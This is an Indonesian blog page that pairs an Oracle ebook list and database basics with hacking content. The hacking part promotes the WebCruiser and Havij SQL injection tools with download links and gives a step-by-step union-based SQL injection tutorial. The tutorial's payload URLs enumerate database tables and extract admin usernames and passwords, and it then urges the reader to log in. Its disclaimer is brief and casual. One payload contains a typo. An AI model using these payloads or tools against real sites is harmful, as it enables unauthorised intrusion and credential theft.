Ebook Oracle Database

Saya punya beberapa eBook yang bisa kalian download .. ^_^

Sejarah Singkat Oracle

Perusahaan Oracle didirikan pada tahun 1977 oleh tiga orang programmer, Bob Miner, Ed Oates, dan Larry Ellison yang menjabat sebagai CEO (Chief Executive Officer) selama beberapa tahun sampai saat ini. Perusahaan ini berkonsentrasi pada pembuatan database server di mainframe.

Kisah sukses Oracle Corp terkait dengan sejarah dan teori database relasional. Teori database relasional diperkenalkan hampir secara simultan oleh Edgar F. Codd (dalam artikelnya yang terkenal Large shared data banks) dan seorang penemu lain yang kurang dikenal, pada tahun 1969. IBM adalah perusahaan pertama yang menerapkan model relasional ini dalam bahasa SQL, dengan produknya DB2. Sayangnya IBM agak ragu akan keampuhan SQL dan model relasional (nantinya akan berpengaruh pada ketertinggalan IBM di pasar database-server sistem operasi Unix dan Windows ).

Larry melihat perkembangan teori model relasional dan implementasi database relasional dalam DB2. Ia yakin bahwa model relational adalah “way of the future” dan memutuskan untuk mengimplementasikan model relasional di produk Oracle. Sebelumnya produk database Oracle memakai model nonrelasional. Oracle menjadi pesaing kuat bagi IBM dalam pasar database server di mainframe, terutama database bermodel relasional.

Sekitar pertengahan tahun 1980an, Larry mendiversifikasi produk Oracle (versi 6.x) keluar mainframe, yakni ke sistem operasi Unix. Selanjutnya tahun 1996 Oracle Corp mendiversifikasi Oracle (versi 7.x) ke sistem operasi Novell Netware, Windows NT, dan Linux (versi 8.x, tahun 1997).
Mulai pertengahan tahun 1990an Oracle Corp mulai membuat juga produk-produk nondatabase-server seperti application server (WebDB, OAS), development tools (Oracle Developer, Oracle Designer), dan application suite (Oracle Apps).

Model Basis Data Relasional
Model basis data relasional adalah model formal tentang data. Sebagai model formal, model ini menspesifikasikan struktur (tipe) data yang formal, operasi-operasi yang formal, dan aturan integritas nilai yang formal.
Basis data relasional memiliki satu struktur logik yang disebut relasi (relation) dan pada level fisik berupa tabel (table). Atribut (attribute) merepresentasikan elemen dari data yang berkaitan dengan relasi. Sebagai contoh, relasi Pegawai memiliki atribut-atribut seperti nama, nomor pegawai, dan alamat. Sebuah relasi dinotasikan secara konvensional dengan :
Relation (attribute1, attribute2,..)
Contoh : Pegawai (Nama, Nomor_Pegawai,Alamat,..)
Nilai data dari atribut dari sebuah relasi akan disimpan dalam tuple atau row (baris) dari tabel.

Relational Database Management System (RDBMS)
RDBMS (Relational Database Management System) adalah perangkat lunak untuk membuat dan mengelola database, sering juga disebut sebagai database engine. Istilah RDBMS, database server-software, dan database engine mengacu ke hal yang sama; sedangkan RDBMS bukanlah database. Beberapa contoh dari RDBMS diantaranya Oracle, Ms SQL Server, MySQL, DB2, Ms Access.

Pengertian Oracle
Oracle adalah relational database management system (RDBMS) untuk mengelola informasi secara terbuka, komprehensif dan terintegrasi.
Oracle Server menyediakan solusi yang efisien dan efektif karena kemampuannya dalam hal sebagai berikut :
• Dapat bekerja di lingkungan client/server (pemrosesan tersebar)
• Menangani manajemen space dan basis data yang besar
• Mendukung akses data secara simultan
• Performansi pemrosesan transaksi yang tinggi
• Menjamin ketersediaan yang terkontrol
• Lingkungan yang terreplikasi

Bahasa SQL
SQL (Structured Query Language) digunakan sebagai antarmuka dalam pengelolaan data. SQL merupakan bahasa yang komprehensif untuk basis data, sehingga dibuat standar untuk bahasa SQL oleh ANSI (American National Standard Institute) dan ISO (International Standard Organization). Di dalamnya terdapat perintah untuk pendefinisian data, melakukan query dan update terhadap data. Perintah tersebut dikelompokkan dalam dua istilah: DDL (Data Definition Language) untuk pendefinisian data dan DML (Data Manipulation Language) untuk melakukan update dan query. Kebanyakan vendor dari RDBMS menggunakan SQL dari ANSI/ISO, tetapi beberapa vendor RDBMS memasukkan beberapa perintah tambahan sebagai fitur dari produknya. Di antaranya adalah fitur untuk pemberian hak akses terhadap data ataupun untuk maintenance.

SQL*Plus
Dalam menerima masukan perintah SQL dari pengguna, vendor RDBMS telah menyediakan library yang dapat digunakan oleh programmer agar program yang dibuat dapat melakukan pengaksesan terhadap basis data. Selain itu, para vendor memberikan pula program yang dapat menerima masukan bahasa SQL yang kemudian dieksekusi oleh RDBMS. Oracle, sebagai salah satunya, telah menyediakan program yang dinamakan SQL*Plus. SQL*Plus dapat digunakan untuk melakukan eksekusi terhadap perintah SQL dari pengguna.
SQL vs SQL*Plus
SQL : Merupakan bahasa yang meliputi perintah-perintah untuk menyimpan,
menerima dan memelihara data dalam basis data.
SQL*Plus : Aplikasi yang dapat mengenali dan mengeksekusi perintah SQL dan
dapat menampilkan hasil dari perintah tersebut ke pengguna.

Data Definition Language (DDL)
DDL merupakan bagian dari perintah SQL untuk membuat, memodifikasi atau menghapus struktur basis data Oracle.
Pembuatan tabel dalam suatu basis data dilakukan setelah melalui tahapan membuat model data dan membuat desain data. Elemen-elemen yang harus ada dalam pembuatan suatu tabel yaitu: nama tabel, nama kolom dan tipe data kolom.

*==> Berikut ini daftar eBook yang sudah tersedia saat ini. Saya akan terus menambah koleksinya :

1. Buku Pegangan Oracle DBA (type:PDF, size:2513KB)
2. Dataguard 10g: Panduan Singkat Membuat and Me-manage Physical Standby Database (type:PDF, size:193KB)
3. Panduan Install Database Oracle10g di Windows (type:PDF, size:338KB)
4. Step-step membuat database Oracle 10g (type:PDF, size:457KB)

Link Sumber

Berikut ini e-book dari Oracle Documentation. Hal cipta ada pada Oracle, saya hanya memberikan link-nya saja

1. Database 10g: Konsep
2. Database 10g: Administrator’s Guide
3. Database 10g: Administrator’s Simple Guide
4. Database 10g: Backup and Recovery Basics
5. Database 10g: Backup and Recovery Advance (RMAN)
6. Database 10g: Performance Tuning Guide
7. Database 10g: Performance Tuning Simple Guide
8. Database 10g: Net Services (Network, jaringan)
9. Database 10g: Daftar e-book lainnya

Cara mencari kelemahan website/situs

Dengan begitu berkembangnya internet dewasa ini, situs web yang bermunculan tiap hari, begitu pula dengan virus dll. Bagi yang hobby mengutak atik website tentunya tidak asing lagi dengan istilah security untuk website/situs, mulai dari istilah sql injections dan lain sebagainya.

Kali ini saya akan berbagi tools untuk menguji dan mencari kelemahan website/situs, WebCruiser Web Vulnerability Scanner Enterprise v2.5.0, adalah sebuah perangkat lunak yang khusus dirancang untuk tujuan ini.

WebCruiser Web Vulnerability Scanner adalah sebuah perangkat lunak penetrasi web yang efektif dan kuat yang akan membantu kita dalam mengaudit website/situs, juga memiliki scanner kerentanan dan sengkaian alat keamanan.

Mendukung pemindaian situs POC (Proof of concept) kerentanan situs seperti: SQL Injection, Cross Site Scripting, XPath Injection dll. juga, WebCruiser juga adalah sebuah alat SQL injection otomatis, XPath injection tool, dan Cross Site Scripting tool!

Apa itu WebCruiser?, WebCruiser adalah alat untuk:

SQL Injection Tool pertama untuk Windows 7, Windows Vista
Web Vulnerability Scanner
SQL Injection Scanner
Cross Site Scripting Scanner
XPath Injection Scanner
Automatic SQL Injection Tool (POC)
Cross Site Scripting Tool (POC)
XPath Injection Tool (POC)
Post Data Resend Tool

Fitur Webcruiser:

Crawler(Site Directori dan File)
Vulnerability Scanner: SQL Injection, Cross Site Scripting, XPath Injection dll.
SQL Injection Scanner
SQL Injection Tool: GET/Post/Cookie Injection POC(Proof of Concept)
SQL Injection for SQL Server: PlainText/Union/Blind Injection
SQL Injection for MySQL: PlainText/Union/Blind Injection
SQL Injection for Oracle: PlainText/Union/Blind/CrossSite Injection
SQL Injection for DB2: Union/Blind Injection
SQL Injection for Access: Union/Blind Injection
Post Data Resend
Cross Site Scripting Scanner and POC
XPath Injection Scanner and POC
Auto Get Cookie From Web Browser For Authentication
Report Output.

Download WebCruiser Web Vulnerability Scanner Enterprise v2.5.0 [212 Kb]

Hacking Web Dengan SQL Injection

Harap dicatat bahwa penulis tidak bertanggung jawab atas segala bentuk efek dari artikel ini, tujuannya hanya untuk pengetahuan saja, jadi silahkan gunakan untuk kebaikan dan keamanan kalian masing2. Pertanyaan yang bersifat “Merusak” tidak akan ditanggapi. Cara ngehacking web atau biasa disebut web attack sangat banyak caranya, salah satunya dengan cara SQL injection.

Apa itu SQL injection ?
SQL injection terjadi ketika attacker bisa meng-insert beberapa SQL statement ke ‘query’ dengan cara manipulasi data input ke applikasi tsb.
ini salah satu cara melakukan tekhnik SQL injection, cara ini saya copas dari http://jasakom.com oleh seorang penulis sebut saja cruz3N
oke, mari kita simak bersama-sama.

1. Pertama kali yang kita lakukan tentu mencari target. Misalnya target kita kali ini adalah

http://www.target.com/berita.php?id=100

2. Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.
Contoh :

http://www.target.com/berita.php?id=100'

atau

http://www.target.com/berita.php?id=-100

4. Maka akan muncul pesan error…
“You have an error in your SQL syntax.You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to use near ”’
at line 1″ Dan masih banyak lagi macamnya.

5. Next step adalah mencari dan menghitung jumlah table yang ada dalam databasenya…
Disini kita akan menggunakan perintah order by
Contoh :

http://www.target.com/berita.php?id=100+order+by+1/*

Hohoho…apalagi itu “/*” ? Itu adalah karakter penutup perintah SQL atau kita juga bisa pake “–”. Terserah aja…
Kalo “+” sebagai penghubung perintah…

6. Nah sampe sini langsung dah nyobain satu2…

http://www.target.com/berita.php?id=100+order+by+1/* (gak ada error)
http://www.target.com/berita.php?id=100+order+by+2/* (gak ada juga)
http://www.target.com/berita.php?id=100+order+by+3/* (capek dah)
http://www.target.com/berita.php?id=100+order+by+4/* (jangan nyerah)

Sampai muncul error…
Misalkan errornya disini…

http://www.target.com/berita.php?id=100+order+by+10/*

Berarti yang kita ambil adalah “9″

http://www.target.com/berita.php?id=100+order+by+9/*

7. Untuk mengetahui berapa angka yang show sekarang kita pake UNION
Contoh :

http://www.target.com/news.php?id=100+union+select+1,2,3,4,5,6,7,8,9/*

Trus perhatikan angka berapa yang kelua

8. Misalnya angka hoki yang keluar adalah “3″ maka yang bisa akan kita lakukan adalah mengecek versi berapa mysql yang dipake dengan perintah “version()” atau “@@version”

http://www.target.com/news.php?id=100+union+select+1,2,version(),4,5,6,7,8,9/*

Atau

http://www.target.com/news.php?id=100+union+select+1,2,@@version,4,5,6,7,8,9/*

9. Nah kalo versinya 5 langsung aja pake perintah “information_schema” untuk melihat tabel dan kolom yang ada pada database…
Contoh :

http://www.target.com/berita.php?id=100+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*

Nah katanya kalo untuk melihat tabel-tabel yang lain kita tambahkan LIMIT pada akhir URL. Tapi waktu itu gua gak pake keliatan kok tabelnya…Apa gua salah? Mungkin tapi sekarang yang gua mau jelaskan adalah VERSI DAN PENGALAMAN GUA. Mungkin agak lain…ya maklum lah baru belajar…Hehehe…

Misalnya yang lo liat adalah table “admin”
Nah sekarang kita liat-liat dulu kolomnya dengan mengganti aja kata “table”-nya…
Contoh:

http://www.target.com/berita.php?id=100+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.colums/*

Misalnya kolom yang keluar adalah “password” dan “username”
Langsung aja kita liat isinya…
Contoh :

http://www.target.com/news.php?id=100+union+select+1,username,3,4,5,6,7,8,9+from+admin/*

dan

http://www.target.com/news.php?id=100+union+select+1,password,3,4,5,6,7,8,9+from+admin/*

Bisa diliat dah username ama passwordnya…Tinggal login…Cari yang asik terus…Terserah Anda…
—————————————————
begitulah yang dituliskan disana.
anda masih belum paham tentang apa SQL injection ?
tenang silahkan anda download file dokumen dibawah ini tentang SQL injection step by step.

Download SQL injection step by step.DOC 

oke selamat mencoba. yang terpenting jangan dilakukan di web teman anda ataupun di website Lokal.
referensi :
http://jasakom.com
http://ezine.echo.or.id
http://cruzenaldo.co.cc
http://students.ee.itb.ac.id
Catatan: Cara otomatis dengan memakai software bisa juga dilakukan, selengkapnya lihat artikel berikut ini
Atau mau mencoba tool yang baru saya dapatkan? namanya Havij. Adapun fitur2nya:

1. Supported Databases with injection methods:
• MsSQL 2000/2005 with error
• MsSQL 2000/2005 no error (union based)
• MySQL (union based)
• MySQL Blind
• MySQL error based
• Oracle (union based)
• MsAccess (union based)
2. Automatic database detection
3. Automatic type detection (string or integer)
4. Automatic keyword detection (finding difference between the positive and negative response)
5. Trying different injection syntaxes
6. Proxy support
7. Real time result
8. Options for replacing space by /**/,+,… against IDS or filters
9. Avoid using strings (magic_quotes similar filters bypass)
10. Bypassing illegal union
11. Full customizable http headers (like referer and user agent)
12. Load cookie from site for authentication
13. Guessing tables and columns in mysql<5 (also in blind) and MsAccess
14. Fast getting tables and columns for mysql
15. Multi thread Admin page finder
16. Multi thread Online MD5 cracker
17. Getting DBMS Informations
18. Getting tables, columns and data
19. Command executation (mssql only)
20. Reading system files (mysql only)
21. Insert/update/delete data

Download HAVIJ

 

Sumber Ide dari sini